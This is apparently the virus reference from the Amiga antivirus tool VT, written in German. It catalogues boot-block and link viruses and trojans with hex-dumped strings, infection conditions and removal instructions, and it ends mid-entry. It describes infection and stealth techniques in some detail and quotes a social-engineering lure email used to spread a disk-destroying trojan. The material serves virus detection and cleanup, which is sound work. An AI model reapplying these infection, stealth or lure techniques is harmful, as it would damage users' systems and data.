THE INVASION HAS STARTED! YOUR TIME HAS RUN OUT, AND SOON WE WILL BE EVERYWHERE! Bildschirmmitte: Vektordemo unterer Bildschirmbereich: THIS IS GENERATION 0039 OF THE EVIL AMIGAKNIGHTSVIRUS GREETINGS TO DUFTY, DWARF, ASID CUCUMBER ASTERIX, ANDY, AND ALL AMIGIANS I KNOW Vektordemo: 3 TextTeile erscheinen mit Zoomeffekt nacheinander a) Toco of b) THE c) AMIGAKNIGHTS - AmiPatch-Virus V1.0a File Laenge:8288 Bytes Wahrscheinlich ein Einbruchswerkzeug, also ungefaehrlich fuer den Normal-User ohne Mailbox. Oeffnet user.data und legt ein neues File an (doswrite): bbs:011011 Ich haette das Programm nicht aufgenommen, wenn es nicht auch OHNE Hauptprogramm in der Shell behaupten wuerde, zu opti- mieren (Prozentzahlen). Hinweis 12.94: Ein Antivirusprogramm erkennt in den Files MakeIcon, SCSIMaskFix, CDSETMAP, FixIcon usw. ebenfalls das AmiPatch-Virus. Ich gehe davon aus, dass die FEHLERKENNUNG im naechsten Update behoben sein wird. - AmixHack-Trojan gegen BBS bekannte Filenamen: AmixHack0 , 1, 2, 3, 4 Laenge gepackt: 8348 Bytes Laenge ungepackt: 11644 Bytes Keine verbogenen Vektoren Keine Vermehrung Im File ist zu lesen: 7379 sy 733a632f 44656c65 74652042 42533a4e s:c/Delete BBS:N 6f646530 2f43616c 6c657273 4c6f6700 ode0/CallersLog. 002c7379 733a632f 636f7079 20424253 .,sys:c/copy BBS 3a557365 722e4461 74612074 6f206c69 :User.Data to li 62733a54 54412e4c 69627261 72790000 bs:TTA.Library.. Fuer Amiga-User ohne Mailbox ungefaehrlich. VT bietet Loeschen an. - Amos-AGA-Install-Trojan siehe bei AGA-Install-Trojan - AmosJoshua-Trojan 3 Files alle gepackt in Amos programmiert Sie muessen alle 3 Files loeschen und loadwb neu kopieren Ausloesefile: msxR.exe Laenge: 128800 Bytes Entpackt ist im file zu lesen: 00540000 00620008 433a4c6f 61645742 .T...b..C:LoadWB 0008633a 6c6f6164 7762000f 64676764 ..c:loadwb..dggd 66676466 6766676a 61726c00 00000000 fgdfgfgjarl..... Es wird also in c loadwb angelegt Laenge: 84772 Bytes Entpackt ist in loadwb zu lesen: 000000b2 000000b8 000a7261 6d3a6c6f ..........ram:lo 61647762 000a7261 6d3a6c6f 61647762 adwb..ram:loadwb 000a7261 6d3a6c6f 61647762 00177379 ..ram:loadwb..sy 733a7762 73746172 7475702f 776f726b s:wbstartup/work 62656e63 6800001c 7379733a 77627374 bench...sys:wbst 61727475 702f776f 726b6265 6e63682e artup/workbench. 696e666f 00000000 000003f2 000003e9 info............ Beim naechsten Computerstart legt loadwb in wbstartup: das File workbench an. Laenge: 40668 Bytes Entpackt ist in workbench zu lesen: 00000150 00000158 00177379 733a7762 ...P...X..sys:wb 73746172 7475702f 776f726b 62656e63 startup/workbenc 6800001c 7379733a 77627374 61727475 h...sys:wbstartu 702f776f 726b6265 6e63682e 696e666f p/workbench.info 00244775 52755820 6d456449 74417449 .$GuRuX mEdItAtI 6f4e7a3a 205b4a6f 53685561 b4532074 oNz: [JoShUa.S t 526f4a61 4e5d002f 41644472 457a5a3a RoJaN]./AdDrEzZ: 205b794f 75522043 6f6d5075 5465525d [yOuR ComPuTeR] 20205461 5a6b3a20 5b537953 74456d20 TaZk: [SyStEm 4b694c6c 45725d00 0026204d 6f526520 KiLlEr]..& MoRe 694e664f 724d6154 694f6e3a 205a6f4d iNfOrMaTiOn: ZoM 62496540 70416c41 2e7a5a6e 2e436f4d bIe@pAlA.zZn.CoM - AmosJoshua-Clone-Trojan Einige Tage spaeter aufgetaucht Spanische Doc 3 Files alle nicht gepackt In Amos programmiert Sie muessen alle 3 Files loeschen und loadwb neu kopieren Ausloesefile: SonicIIAmiga.exe Laenge: 182452 Bytes 63617267 616e646f 20626c6f 71756573 cargando bloques 2e2e2e2e 2e000008 633a6c6f 61647762 ........c:loadwb 0007746f 6e696969 69000000 00000000 ..toniiii....... In loadwb (Laenge: 122836 Bytes) ist zu lesen: 000000aa 000000b0 000a7261 6d3a6c6f ..........ram:lo 61647762 000a7261 6d3a6c6f 61647762 adwb..ram:loadwb 000a7261 6d3a6c6f 61647762 001a7379 ..ram:loadwb..sy 733a7762 73746172 7475702f 6d69616d s:wbstartup/miam 692e636f 6e666967 001f7379 733a7762 i.config..sys:wb 73746172 7475702f 6d69616d 692e636f startup/miami.co 6e666967 2e696e66 6f000000 00000000 nfig.info....... In wbstartup/miami.config (Laenge 60728 Bytes) wurde nicht soviel Text wie in workbench (s.o.) gefunden: 00000000 00000000 00007365 7269616c ..........serial 2e646576 69636500 7072696e 7465722e .device.printer. 64657669 63650070 6172616c 6c656c2e device.parallel. 64657669 63650000 246d0148 d4fc0000 device..$m.H.... - ANDY-Virus File siehe unten bei conclip-Virus - ANDY.BB-Virus BB siehe unten bei Joshua4-Virus - Angel-Virus BB Cool, PutMsg, Wait Fordert trackdisk.device NICHT Nach RESET GURU, da Cool absoluten Sprung enthaelt: 4EF9 000110CC JMP $110CC (Anfaenger !!) Namensbegruendung: s.u. Vermehrung: ueber BB (auch wenn die Cool-Routine falsch ist) Jeder BB sieht anders aus, da codiert mit Wert aus $DFF007 . Schaeden: Abhaengig von einer Zaehlzelle wird ueber Seek ein KopfStep ausgefuehrt. Die Textausgabe (s.u.) ist mir nicht gelungen. Text im Speicher decodiert mit: eor.b d2,(a1)+ 54686520 54726176 The Trav 656c206f 66207468 6520416e 67656c2d el of the Angel- 56697275 73204765 6e657261 74696f6e Virus Generation 204e722e 30303030 30202048 69204275 Nr.00000 Hi Bu 746f6e69 63202620 47616e64 616c6600 tonic & Gandalf. 4c617566 7765726b 20444630 3a206973 Laufwerk DF0: is 74206c65 69646572 20626573 6368e464 t leider besch.d 6967742e 2e2e0000 igt... VT-kennt: 02.12.92 - Animal-Virus SADDAM-Clone Blocklangwort: $363636a0 Namensbegruendung: im Speicher ist decodiert zu lesen 74726163 6B646973 6B2E6465 76696365 trackdisk.device 00010820 416E696D 616C2056 69727573 ... Animal Virus Behandlung: siehe bei SADDAM 28.03.93 - Animation-Trojan Zerstoerung Archivname: Amination.lha Filename: Animation Laenge: 23244 Bytes Keine verbogenen Vektoren VT bietet Loeschen an Schaden: Greift mit DoIo auf scsi.device zu Das Zerstoerungsfile enthaelt ein weiteres Programm (ALook), das nie erreicht wird. Das Teil wurde in einer Mailing-Liste veroeffentlicht: Hi everyone! I'm trying to write my first Amiga program - a fractal generator. It's supposed to open a window and do some drawings in it. Unfortunately, it displays some strange garbage on the screen. I attached binary file to this message - could you PLEASE check this out? Any help appreciated Thanks in advance Stan Content-Type: application/octet-stream; name="Animation.lha" Content-Transfer-Encoding: base64 - ANTI-KANACKEN-Virus BB SCA-Clone (s.u.) Namensbegruendung: 6f732e6c 69627261 72790000 44617320 os.library..Das 414e5449 2d4b414e 41434b45 4e205669 ANTI-KANACKEN Vi 72757320 28536965 67204865 696c292d rus (Sieg Heil)- Hallo ihr jungen Leute im wiedervereinigten Deutschland. Wollt ihr, dass die Welt Grund hat, mit dem Finger auf uns zu zeigen. So schafft ihr es bestimmt, ALLES was eure Eltern in 47 Jahren aufgebaut haben, in kurzer Zeit kaputt zu machen. Denkt BITTE nach !!! VT-kennt: 17.10.92 - Antichrist-Virus Link dosbase+$2e KS2.04: nein Grundgeruest war ein Trav. Jack (siehe unten) Namensbegruendung: im Speicher ist zu lesen: 20202020 20202020 20202020 20202020 20202020 20202020 20546865 20416e74 The Ant 69636872 69737420 332f342f 39322020 ichrist 3/4/92 20202020 20202020 20202020 20202020 Unterschiede zu Trav, Jack: - legt ab und zu ein File an mit der Laenge: #26 Bytes Name Antichrist.X (das X wechselt, siehe Beispiel). Inhalt des Textfiles siehe Beispiel Antichrist.Y 0c0a0d54 68652041 6e746963 68726973 ...The Antichris 74206973 20626163 6b0a0000 00000000 t is back....... - Codierung des VirusPrg.s fehlt. - Hunklaenge wechselnd $24f oder $250 VT erkennt und loescht im Speicher: 13.03.93 VT erkennt und baut aus im File : 14.03.93 VT erkennt und loescht neues File : 14.03.93 - AramDol-Virus File Link vgl. auch xcom-LVirus, HappyNewY.96 ab KS2.04: ja (Versionsabfrage auf mind. #37) Namensbegruendung: im Linkteil ist uncodiert zu lesen: 0004202e 0202b0bc fffff3ec 674c7025 .. .........gLp% ;.... ^^^^^^^^ 293e2041 72616d2d 446f6c20 3c28000d )> Aram-Dol <(.. ;.... 646f732e 6c696272 61727900 000003ef dos.library..... ^^^^ Verbogener Vektor: LoadSeg LastAlert Resetfest: Nein Fileverlaengerung: 560 Bytes Link hinter den ersten Hunk. VT versucht Loadseg im Speicher zurueckzusetzen. VT versucht den Linkteil aus einem File auszubauen. Speicherverankerung: - LastAlert (FFFFF3EC) darf noch nicht verbogen sein - LoadSeg wird verbogen Vermehrungsbedingungen: - File ist noch nicht verseucht (Test 3EF) - Filename enthaelt nicht ".l" oder "-" - max. Filelaenge #80000 Bytes - min. Filelaenge #3000 Bytes - 3E9-Hunk wird gefunden (Loop) - Disk validated - mind. 4 Block frei - RTS wird gefunden ( max. loop $3F ) - RTS wird ersetzt durch bra.s oder NOP (falls RTS genau am Ende des ersten Originalhunks) Ueberspringt 3E8,3F0,3F1-Hunks usw. !!!!! Das Teil meldet sich nicht. Hinweis: Falls Ihre HD sehr verseucht ist, dann beginnen Sie bitte mit dem C-Verz. (File-Speicher-File). Das haeufige Neueinlesen wird dadurch geringer. - Art Byte Bandit anderer Name: ByteBanditPlus s.u. - ASSASSIN Virus BB SCA-Clone s.u. 43544544 20425920 54484520 20202050 CTED BY THE P 50041f41 53534153 53494e20 56495255 P..ASSASSIN VIRU 53202020 20202020 20202020 20202020 S - ASSHOLE-Virus BB Verbogene Vektoren: Cool, DoIo Im Speicher immer ab $70000 Fordert trackdisk.device NICHT Im BB ist uncodiert zu lesen: 20313939 34202020 20204954 6053204e 1994 IT`S N 4f542041 20545249 434b2e2e 2e2e2049 OT A TRICK.... I 54605320 41204153 53484f4c 45202121 T`S A ASSHOLE !! 21202020 20202020 20202031 39393420 ! 1994 Hinweis: Schreibt bei mir nicht. Fehler in der Programmierung. Also fuer die Erbsenzaehler - ASV-Virus immer $7DC00, Cool, im Prg Forbid, loescht KickTag usw. keine Vermehrungsroutine Schaden: verbiegt mit setfunction Forbid auf ChipAllocMem-Routine d.h. bei jedem Forbid-Aufruf geht ChipMem verloren. - ASYLANT-Virus SCA-Clone nur Text geaendert 2048616c Hal 6c6f2069 63682062 696e2065 696e2020 lo ich bin ein 4153594c 414e5420 21212121 21212121 ASYLANT !!!!!!!! - ATARI File BGS9-Clone s.u. Laenge:2609 Bytes 00000000 41544152 49000003 f3000000 ....ATARI....... Siehe auch bei BGS9 Seit wann bitte ist ein Programm mit UNGERADER Laenge lauf- faehig (Sollte loadhunk defekt ausgeben). Man kann nicht einfach aus TTV1 den Text ATARI machen und damit alles um 1 Byte verlaengern. Anfaenger !!! - Australian Parasite Fastmem ja, Cool, DoIo, im Prg. BeginIo Vermehrung: ueber BB ueber GraphikRoutine wird BildschirmInhalt gedreht im BB sichtbar: The Australien Parasite! By Gremlin 18/5/88! Will NOT destroy game bootsectors or corrupt disks, and kill other viruses! HINWEIS: manchmal gibt VirusX Australian Parasite aus, obwohl es sich um den SADDAM Disk-Validator handelt !!!! - Aust.Par-Clone BB anderer Name:SHI-Virus Nur Text geaendert: 20576520 6c696b65 20566972 692e2043 We like Viri. C 616c6c20 5658512d 42425320 28343136 all VXQ-BBS (416 29203332 34203934 3339202e 53656e64 ) 324 9439 .Send 206e6577 20766972 69202c20 77656c63 new viri , welc 6f6d6520 746f2042 42532020 3a000018 ome to BBS :... 00002053 48492153 48492153 48492153 .. SHI!SHI!SHI!S - AutoBootingBootProtector V2.0 anderer Name: VCCofTNT-Virus s.u. - BB.Virus-$133 Name: nach Code-Laenge im BB, da kein Text vorhanden Nicht Resetfest Verbogener Vektor: DoIo 68030: ja Test auf trackdisk.device: ja Vermehrung: mit DoIo, falls Kennung "DO" gefunden. Zerstoerung: ein Block wird in Abhaengigkeit von $DFF007 mit Speichermuell gefuellt. Dieser Block ist NICHT zu retten. - B.E.O.L.-LVirus Link-Virus Namensbegruendung s.u. Andere moegliche Namen: Mount-972-Virus, 4EAE-Virus, FFFFFFE9-Virus Verlaengert ein File um 972 Bytes. Im decodierten Linkteil ist zu lesen: 22006720 4eaeff82 4eaeffa6 6108632f ".g N...N...a.c/ 6d6f756e 7400221f 242afff0 4eaeffe2 mount.".$*..N... Keine verbogenen Vektoren Nicht Resetfest Haengt sich im Speicher fest ueber Dos-Strukturen. VOLUME-MsgPort Schreibt $FFFFFFE9 nach $202(a6) (LastAlert) KS2.04: ja (cmpi.b #$25,$15(a6) Der Linkteil wird mit Wert aus $DFF006 immer neu codiert. VT versucht Ausbau und versucht $4EAEuvwx wieder richtig zu setzen. Test mit Syquest-44: in 1/4 Stunde waren alle wichtigen Dirs hoffnungslos verseucht. Das Teil meldet sich nicht. Verwendet Sprungbefehle, die erst in neueren KS vorkommen. Haengt sich hinter Hunk. Ablauf: Test auf $03F3 (ausfuehrbar) Test auf $FFFFFFE9 (schon verseucht) Suche nach $4EAE ( jsr -xy(Lib-Base) ) ( xy ist variabel, aber haeufig openlib) Falls gefunden, Test ob Abstand zu Hunkende kleiner $7FFF. Falls nein, weitersuchen Falls ja ( addi.b #$c,-(a1) ) d.h. $4EAE wird in $4EBA ( jsr Hunkende(PC) ) geaendert. Sobald eine Zaehlzelle nach LSL.B #2,D1 Null wird, wird ein weiterer Linkteil mit NEG.L (A7) noch einmal decodiert. Es wird dann ein File README mit der Laenge 1152 Bytes geschrieben. Dieses File enthaelt 32x : ©+® B.E.O.L. 1995! Don't be angry!! Speichererkennung: VT versucht auch LastAlert zu aendern ($FFFFFFFF). Dieser Wert muss aber nicht immer stimmen. VT versucht das Teil im Speicher abzuschalten (Bei meinen Tests gelungen). Wenn Sie 100%-Sicherheit haben wollen, dann nutzen Sie das Reset- Angebot. Booten Sie UNBEDINGT von einer SAUBEREN Antivirusdisk !!!! Ein Reset und dann die startup-sequence der Festplatte abarbeiten zu lassen, ist gefaehrlich, da hoechstwahrscheinlich Programme der startup-sequence verseucht sind !!!!!!!!! Hinweis: Falls sehr viele Dirs verseucht sind, empfehle ich Ihnen mit Sp-File-Sp (FileReq.) zu arbeiten. VT bewegt sich dann nur in dem gewaehlten Verzeichnis. - Klicken Sie Sp-File-Sp - Klicken Sie devs - Waehlen Sie ein Unterverzeichnis - Klicken Sie DirFTest - Lassen Sie VT die Ausbauten vornehmen - Waehlen Sie danach ein anderes Unterverzeichnis Ueberlegen Sie bitte auch, ob Sie nach der Entseuchung nicht einzelne Unterverzeichnisse ins RAM kopieren wollen. Danach z.B. das c: komplett loeschen und dann von RAM zurueckkopieren. Die Fragmentierung der Festplatte duerfte verkleinert werden. Falls die Meldung "Sprungbefehl falsch" bei VT auftaucht: VT glaubt am 1. Hunkende das Virusteil gefunden zu haben, findet aber den Sprungbefehl nicht. Ueberlegen Sie bitte ob das File vielleicht schon mit einem anderen Programm bearbeitet wurde und lassen sie dann VT versuchen, das Linkteil auszubauen. Es gab in der Vergangenheit schon MEHRMALS Programme, die NUR die Aktivierung des jeweiligen Virusteils abgeschaltet haben, das Virusteil selbst aber NICHT ausge- baut haben. Hinweis: Es soll wieder ein Programm erschienen sein (Aug.95), das nur den Sprungbefehl zuruecksetzt, das Virusteil aber im File NICHT ausschneidet. VT sollte dann melden: "Sprungbefehl nicht gefunden". Probieren Sie aber mit VT dennoch einen Ausbau. - B.E.O.L.-2-LVirus Link-Virus Namensbegruendung s.u. siehe auch bei BEOL Verlaengert ein File um 1140 Bytes. Im decodierten (2x) Linkteil ist zu lesen: 4eeeff76 00296865 6c6c6f2c 2069276d N..v.)hello, i'm 20422e45 2e4f2e4c 2e20616e 64206920 B.E.O.L. and i 6c6f7665 20796f75 210a3a52 4541444d love you!.:READM 4500646f 732e6c69 62726172 79000000 E.dos.library... ffffffe9 0000 ...... Keine verbogenen Vektoren Nicht Resetfest Haengt sich im Speicher fest ueber Dos-Strukturen. VOLUME-MsgPort Schreibt $FFFFFFE9 nach $202(a6) (LastAlert) KS2.04: ja (cmpi.b #$25,$15(a6) Der Linkteil wird mit Wert aus $DFF007 immer neu codiert. VT versucht Ausbau und versucht $4EAEuvwx wieder richtig zu setzen. Test mit Syquest-44: in kurzer Zeit waren alle wichtigen Dirs hoffnungslos verseucht. Das Teil meldet sich nicht. Verwendet Sprungbefehle, die erst in neueren KS vorkommen. Haengt sich hinter Hunk. Ablauf: Test auf $03F3 (ausfuehrbar) Test auf $FFFFFFE9 (schon verseucht) siehe oben Suche nach $4EAE ( jsr -xy(Lib-Base) ) ( xy ist variabel, aber haeufig openlib) Falls gefunden, Test ob Abstand zu Hunkende kleiner $7FFF. Falls nein, weitersuchen Falls ja ( addi.b #$c,-(a1) ) d.h. $4EAE wird in $4EBA ( jsr Hunkende(PC) ) geaendert. Sobald eine Zaehlzelle nach AND.B #$7F,D0 Null wird, wird ein weiterer Linkteil mit NOT.B (A0)+ noch einmal decodiert. Es soll dann ein File README mit der Laenge 1800 Bytes geschrieben werden. Dieses File enthaelt 32x den Text "hello ..." siehe oben Speichererkennung: VT versucht auch LastAlert zu aendern ($FFFFFFFF). Dieser Wert muss aber nicht immer stimmen. VT versucht das Teil im Speicher abzuschalten (Bei meinen Tests gelungen). Wenn Sie 100%-Sicherheit haben wollen, dann nutzen Sie das Reset- Angebot. Booten Sie UNBEDINGT von einer SAUBEREN Antivirusdisk !!!! Ein Reset und dann die startup-sequence der Festplatte abarbeiten zu lassen, ist gefaehrlich, da hoechstwahrscheinlich Programme der startup-sequence verseucht sind !!!!!!!!! Hinweis: Falls sehr viele Dirs verseucht sind, empfehle ich Ihnen mit Sp-File-Sp (FileReq.) zu arbeiten. VT bewegt sich dann nur in dem gewaehlten Verzeichnis. - Klicken Sie Sp-File-Sp - Klicken Sie devs - Waehlen Sie ein Unterverzeichnis - Klicken Sie DirFTest - Lassen Sie VT die Ausbauten vornehmen - Waehlen Sie danach ein anderes Unterverzeichnis Ueberlegen Sie bitte auch, ob Sie nach der Entseuchung nicht einzelne Unterverzeichnisse ins RAM kopieren wollen. Danach z.B. das c: komplett loeschen und dann von RAM zurueckkopieren. Die Fragmentierung der Festplatte duerfte verkleinert werden. Falls die Meldung "Sprungbefehl falsch" bei VT auftaucht: VT glaubt am 1. Hunkende das Virusteil gefunden zu haben, findet aber den Sprungbefehl nicht. Ueberlegen Sie bitte ob das File vielleicht schon mit einem anderen Programm bearbeitet wurde und lassen sie dann VT versuchen, das Linkteil auszubauen. Es gab in der Vergangenheit schon MEHRMALS Programme, die NUR die Aktivierung des jeweiligen Virusteils abgeschaltet haben, das Virusteil selbst aber NICHT ausge- baut haben. - BEOL-3-Virus Link Fileverlaengerung: 1620 Bytes Im File ist uncodiert zu lesen: b6806660 0cad4245 4f4c02d6 66246100 ..f`..BEOL..f$a. ;........ 45ea0018 202afff4 4e75dfdf dfdf034c E... *..Nu.....L 4841034c 5a58035a 4950054c 4841222d HA.LZX.ZIP.LHA"- Speichereinbau: $B4(Process) Ueber DosList werden alle DLT_VOLUME gesucht. In diese wird beim Zeiger $B4 (pr_PktWait) eine Adresse eingetragen, die in den eigenen Virusteil zeigt. Normalerweise ist dieser Zeiger bei allen nicht verseuchten Processen, die ich mir an- geschaut habe, NULL. Wenn also VT in Zukunft "$B4(Process) > 0" ausgibt, dann wurde zwar der BEOL-3 nicht erkannt, aber ein anderes unerwuenschtes Teil hat hoechstwahrscheinlich diesen Zeiger verbogen. Seien Sie gewarnt !!! Das BEOL-3-Teil faengt ueber diesen Zeiger verschiedene Dos- Packets ab (Action_Read, Action_Seek usw.). Auswirkungen solange das Teil im Speicher aktiv ist: Da DosOpen, DosExamine in tieferen Ebenen immer ueber die jetzt abgefangenen DosPackets laufen, erhalten Sie ein falsches Er- gebnis (Fachbegriff Stealth-Virus). Sie werden also z.B. die Originallaenge des Files angezeigt be- kommen und nicht die verseuchte Laenge. Auch ein Hex-Filemonitor zeigt Ihnen bei BEOL-3 das File unverseucht, weil das Teil durch das Laden in den Speicher, das Virusteil vom File entfernt. VT versucht das Teil im Speicher abzuschalten. Fileveraenderung: Falls ein Aufruf von lha usw. (siehe oben) erfolgt, sollen keine Veraenderungen vorgenommen werden. Sonst: Das File wird um #1620 Bytes laenger. Das File besteht immer aus 2 Hunks. Der 1. Hunk ist das Virusteil. Der 2. Hunk ist ein Data-Hunk, in dem sich das Originalfile be- findet, wobei noch der Anfang des Originalfiles (1612 Bytes) nach hinten versetzt wird. VT sollte (wenn BEOL-3 NICHT aktiv ist) diese Files erkennen und in den Ursprungszustand zuruecksetzen koennen. Hinweis 1: Klicken Sie ab und zu in VT auf ein Gadget (z.B. Tools) und dann gleich wieder in diesem Fenster auf Ende. Folge: VT durchlaeuft einen Speicherscan und sollte einen NEU aktivierten BEOL-3 fin- den. Hinweis 2: Auch aeltere VT-Vers. sollten (bei aktivem BEOL-3 im Speicher) bei BEOL-3 verseuchten Files beim BlockKetteTest Fehlermeldungen (Fehler in Blockliste, BadNExtDataBlock) ausgeben, da die von BEOL-3 vorgegebene Filelaenge nicht mit der Blockanzahl zusammen- passt. Das habe ich mit mehreren Rechnern ausprobiert und es sind immer diese Fehlermeldungen gekommen. - BEOL-4-Virus Link Fileverlaengerung: 2000 Bytes WICHTIG !!!!!! Falls VT einen Hinweis auf BEOL4 ausgibt, sollten Sie UNBEDINGT !!!!! von einer sauberen AntiVirusDisk neu Booten. Speichereinbau: bei Tests auf meinen Systemen NIE gelungen 68000/30/40/60: immer GURU 3, 4 oder B Das Teil koennte also nur noch mit 68020 laufen. (Hab ich nicht) Entweder das Teil hat sich nicht eingelinkt und vermehrt oder GURU wenn Festplatte gefunden. ABER !!! Es wurde ein Installer ins Netz gesetzt, der zum Glueck in einem defektem lzx-Archiv ist. Aber es ist auch ein C-source dabei. Damit kann man von Hand einen Link an ein File aus- fuehren. Das File wird um #2000 Bytes laenger. Das File besteht immer aus 2 Hunks. Der 1. Hunk ist das Virusteil. Der 2. Hunk ist ein Data-Hunk, in dem sich das Originalfile be- findet, wobei noch der Anfang des Originalfiles nach hinten versetzt wird. Diese Files sollte VT erkennen und ausbauen koennen. ABER !!!!! Sobald eine Festplatte gefunden wird, veraendert das Teil VOR dem GURU das Filesystem im Rigidbereich !!!!!!!!! LSEG beginnt bei meinem Testmedium auf Block 0+2 Vorher: 0600: 4c534547 00000080 150b81f5 00000007 LSEG............ 0610: 00000004 000003f3 00000000 00000001 ................ 0620: 00000000 00000000 00001821 000003e9 ...........!.... 0630: 00001821 72006008 00000000 00000012 ...!r.`......... 0640: 48e700fe e5892441 2f016160 221f4cdf H.....$A/.a`".L. 0650: 7f004a81 66024e75 4ed64afc 00000026 .J.f.NuN.J....& 0660: 00000050 002800af 0000006a 00000056 ...P.(.....j...V 0670: 00000004 00000000 00000001 00000004 ................ 0680: 00000096 24564552 3a206673 2034302e ....$VER: fs 40. Nachher: 0600: 4c534547 00000080 62ef8c4c 00000007 LSEG....b..L.... 0610: 00000004 000003f3 00000000 00000002 ................ 0620: 00000000 00000001 000001e7 00001833 ...............3 0630: 000003e9 000001e7 487afffe 48e7fffe ........Hz..H... 0640: 606c2c78 0004206e 01142028 00ac6706 `l,x.. n.. (..g. 0650: e588723c 600ad0fc 005c4eae fe807218 ..r<`....\N...r. 0660: d0812a40 614c670e b4956602 2a815880 ..*@aLg...f.*.X. 0670: 30fc4ef9 20c030fc 4e75246f 003c3e3c 0.N. .0.Nu$o.<>< 0680: 01e626da 51cffffc 26ce2c78 0004226e ..&.Q...&.,x.."n Es wird also das Fastfilesystem wie beim angeblichen Filelink umgewandelt und danach kommt IMMER der GURU. Sie fuehren also einen Reset aus und bekommen SOFORT einen GURU-Requester. Abhilfe, die ausgetestet ist und hilft, wenn Sie mit VT ein RIGID-Backup angelegt haben. Weiterhin brauchen Sie auf Disk ein Mountlist-File und den Mountbefehl. ALLE Versuche von meiner Seite mit der Festplatte in diesem Zustand mit der HDtoolbox sind MISSLUNGEN !!!!! - Schalten Sie die Festplatte im Boot-Menue ab - Klicken Sie auf ohne startup-sequence (Wichtig !!!!!) - machen Sie 2 !!!!! Cli-Fenster auf - geben Sie im ersten Fenster mount SDH0: (oder wie Ihr Medium heisst) ein - Es folgt sofort der GURU-Requester - Klicken Sie suspend - das erste Cli-Fenster ist danach UNBRAUCHBAR !!!!! - Laden Sie im zweiten Cli-Fenster VT - Rufen Sie z.Zyl/scanrigid auf - Loeschen Sie mit VT die Virus-Bloecke - jetzt koennen Sie mit VT Ihr Rigid-Backup zurueckspielen oder - Sie Booten neu. Da das Filesystem im RIGID-Bereich jetzt unbrauchbar ist, sollte das Filesystem aus dem ROM ver- wendet werden. Dieses koennte aber fuer Ihre Festplatten- Struktur zu alt sein !!!!!!!!! oder - Da das Virusteil nicht mehr im Rigid-Bereich ist, koennen Sie auch wieder HDToolBox verwenden (Sie haben sich ja die Aufteilung aufgeschrieben oder mit VT (Tools/LWInfo/Druck) ausgedruckt (Etwa NICHT ????). - Falls Ihr Computer KEIN Boot-Menue (uraltes ROM) hat: Tut mir leid. Festplatte ausbauen und bei einem Bekannten am PC neu formatieren. - Falls Sie eine zweite Festplatte in Ihrem Computer haben. SOFORT !!!!! Kabel abziehen, sonst wird auch deren Rigid- Bereich von dem defekten Virusteil veraendert. Wichtig !!!!!! Bei Verdacht booten Sie bitte IMMER von einer sauberen Disk, damit sich das Teil nicht doch auf irgendeinem Computertyp doch im Speicher verankert. Ich habs nicht geschafft. Anmerkung: Nach diesem Vorfall kann ich Ihnen nur dringend empfehlen, alle notwendigen Massnahmen fuer ein Booten ohne Festplatte zu treffen. Weiterhin sollten Sie regelmaessig z.Zyl/Scan- Rigid aufrufen. - BEOL-96-Virus Link Fileverlaengerung: 1792 Bytes + Bytes der Codierungen (variabel) 68000: ja Ab KS2.04 Verbogener Zeiger: $B4(Process) (pr_PktWait=normal Null) Codierung immer neu ($DFF007) Anzahl der Codierungen variabel Mehrfachlink ans gleiche File: ja (Test addbuffers selbst gestoppt nach 18 Links !!!) Defekte Files bei Vermehrung: ja Aktiver BEOL96 im Speicher: Sie sehen die Originalfilelaenge, nie die verseuchte Laenge. Das Teil duerfte aelter sein als BEOL-3 (siehe oben), da BEOL-3 auch noch "saubere" Fileinhalte anzeigt. Im File ist mehrfach decodiert zu lesen: fffc4868 fa884eee fd844245 4f4c3936 ..Hh..N...BEOL96 Speichereinbau: Sucht in Taskliste (ready und wait) nach Process. Verbiegt $B4(Process) auf sich. VT sollte das Teil finden und abschalten. Klicken Sie bitte ab und zu auf ein VT-Gagdet, damit ein Speichertest gestartet wird. Vermeiden Sie andere Programme zu starten (Bitte nicht Amiga+M). Fileeinbau: Es wird ein neuer 1.Hunk geschrieben. Das erste Wort des 1. Original-Hunks wird codiert. VT versucht den Ausbau und das 1.Wort wieder richtig zu schreiben. Hinweis: Falls VT ein bestimmtes LW nicht findet, sollte ein Requester mit dem Fehlerhinweis erscheinen. Sie koennen dann immer noch mit VT (trotzdem Ausbau ja) den 1.Hunk abschneiden, aber das erste Wort wird nicht decodiert !!! Falls Sie auf solche Files treffen (ich hoffe nicht), waere ich fuer eine Zusendung dank- bar. Falls Ihr System verseucht ist: Bitte starten Sie ein Antivirusprogramm Ihrer Wahl von DISK (!!!!) und starten Sie KEINE weiteren Programme. - BadBytes1-Virus BB Warhawk Clone siehe unten Nur Text geaendert. Der Name ist fuer mich nicht nachvollziehbar. Wenn schon, dann waere TTS-Virus besser gewesen. 00200096 81005454 53205649 52555320 . ....TTS VIRUS 4953204f 4e205448 4953204c 414d4552 IS ON THIS LAMER 27532057 4f524b20 21212121 21202041 'S WORK !!!!! A - BadBytes2-Virus BB TimeBomb V1.0 Clone siehe unten Text fuer DisplayAlert: 14536f66 74776172 65204661 696c7572 .Software Failur 65202d20 57652068 61746520 796f7521 e - We hate you! 20596f75 20617265 20676f69 6e672074 You are going t 6f204449 45210001 00000000 42b90007 o DIE!......B... Namensbegruendung: 00416e74 692d4861 72616c64 20506175 .Anti-Harald Pau 6c73656e 20616e64 20547769 6e732076 lsen and Twins v 69727573 20646f6e 65206279 20545453 irus done by TTS 20616e64 204e6967 68746861 776b2020 and Nighthawk 6f662042 61644279 74657349 6e632e2c of BadBytesInc., - BadBytes3-Virus BB Blackflash-Clone siehe unten Nur Text geaendert: 20204951 20427265 616b6572 20766972 IQ Breaker vir 75732020 20220cb9 6600000e 0007f030 us "..f......0 ;...... 446f6e65 20627920 42616420 42797465 Done by Bad Byte 7320496e 63202d20 5468616e 7820746f s Inc - Thanx to - BadBytes4-Virus BB SCA-Clone siehe unten Nur Text geaendert: 6f732e6c 69627261 72790000 20506172 os.library.. Par 61736974 65206f66 20426164 20427974 asite of Bad Byt 65732049 6e632070 72657365 64d2aa2d es Inc presed..- - BadBytes5-Virus BB Coder-Clone siehe unten Nur Text geaendert. Name nicht nachvollziehbar ueber Text. 596f7572 20636f6d 70757465 72206973 Your computer is 2073746f 6e656421 204c6567 616c697a stoned! Legaliz 65206d61 72697568 616e6121 20506172 e mariuhana! Par 61736974 65206f66 20424249 21201400 asite of BBI! .. - BAHAN anderer Name BUTONIC_1.1 siehe dort - Bavarian (L) BB Intro der Bavarian-PD Serie Kein Virus, da keine Vermehrung. Aber zumindest der BB auf Disk 79 schreibt GURU nach $60. Dringende Empfehlung deshalb: Loeschen Im BB ist zu lesen: 70ff4e75 204041e8 002823fc 47555255 p.Nu @A..(#.GURU 00000060 43f900df f000337c 00a00096 ...`C.....3|.... Hinweis: 